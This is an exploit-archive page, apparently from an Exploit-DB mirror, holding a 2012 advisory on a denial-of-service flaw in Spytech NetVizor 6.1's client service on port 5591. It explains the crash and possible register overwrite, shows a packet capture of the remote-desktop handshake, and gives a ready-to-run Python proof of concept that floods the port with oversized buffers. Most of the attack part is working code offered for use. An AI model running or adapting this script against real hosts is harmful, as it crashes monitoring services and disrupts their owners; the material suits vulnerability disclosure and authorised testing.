[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Spytech NetVizor v6.1 (services.exe) DoS
# Published : 2012-08-12
# Author :
# Previous Title : Oracle Outside-In LWP File Parsing Stack Based Buffer Overflow
# Next Title : Adobe Photoshop CS6 PNG Parsing Heap Overflow


# Author: loneferret of Offensive Security
# Product: Spytech VetVizor
# Version: Build Release 6.1
# Vendor Site: hhttp://www.spytech-web.com/
# Software Download: http://www.spytech-web.com/download.shtml#netvizor


# Descriptions:
# NetVizor is the latest in network monitoring software. Monitor your entire network from 
# one centralized location! NetVizor allows you to track workstations and individual users
# that may use multiple PC's on a network. NetVizor records everything users do - from keystrokes 
# typed to email activity. NetVizor can show you what everyone is doing on your 
# network, in real-time, with a single mouse click via its visual network overview and 
# real-time activity ticker. 

# NetVizor Client DoS:
# Using the NetVizor "Viewer", the administrator can initiate a "RDP" like connection to a 
# client workstation with the NetVizor "Client" installed. The port used on the client
# host is 5591, which listens on all interfaces by default. This port is also used by the
# "Viewer" application to grab screenshots of monitored hosts.
# It's possible to have the service crash by sending an overly large string. And it some
# cases this will will overwrite EAX or ECX. Regardless if the registers are overwritten
# or not, the "Viewer" application will no longer be able to initiate a remote desktop
# connection nor will it be able to grab a screen capture.

# Wireshark capture:
# This snip is from a successful connection between the "Viewer" application and the client
# when initiating it's Remote Desktop session. Converting this to HEX and using it in our
# PoC actually triggers it, unfortunately with no proper listener nothing really happens.
#+From the Viewer
#launchremotedesktop
# .r...Yv.r..+..r .
# x.......r...r........-.......|...h........r.....r....-.......|....s...r..$..r,s...s.....r,s.....r...
# ........h............s...SYvQ..
# ....h...w/.w...v..............2..........SYv...r...r..5.....-............s..Hk..h...

#+From client
# Remote desktop started: C:PROGRA~1nvclientrds.exe

#+And the above as seen from Wireshark.
launchremotedesktop
.r...Yv.r..+..r .
x.......r...r........-.......|...h........r.....r....-.......|....s...r..$..r,s...s.....r,s.....r...
........h............s...SYvQ..
....h...w/.w...v..............2..........SYv...r...r..5.....-............s..Hk..h...Remote desktop started: C:PROGRA~1nvclientrds.exe

# PoC:
# In the following script, when EAX or ECX is overwritten it will be with the 'B's.
# As always, if someone wants to investigate further go right ahead. 
# Just be nice.

#!/usr/bin/python

import socket

buffer1= "[AAAA]"  * 500
buffer2= "BBBB"  * 6000

print "nSending buffer 1"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('xxx.xxx.xxx.xxx',5591))
s.send(buffer1)
s.close()

raw_input()

print "nSending buffer 2"
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect(('xxx.xxx.xxx.xxx',5591))
s2.send(buffer2)
s2.close()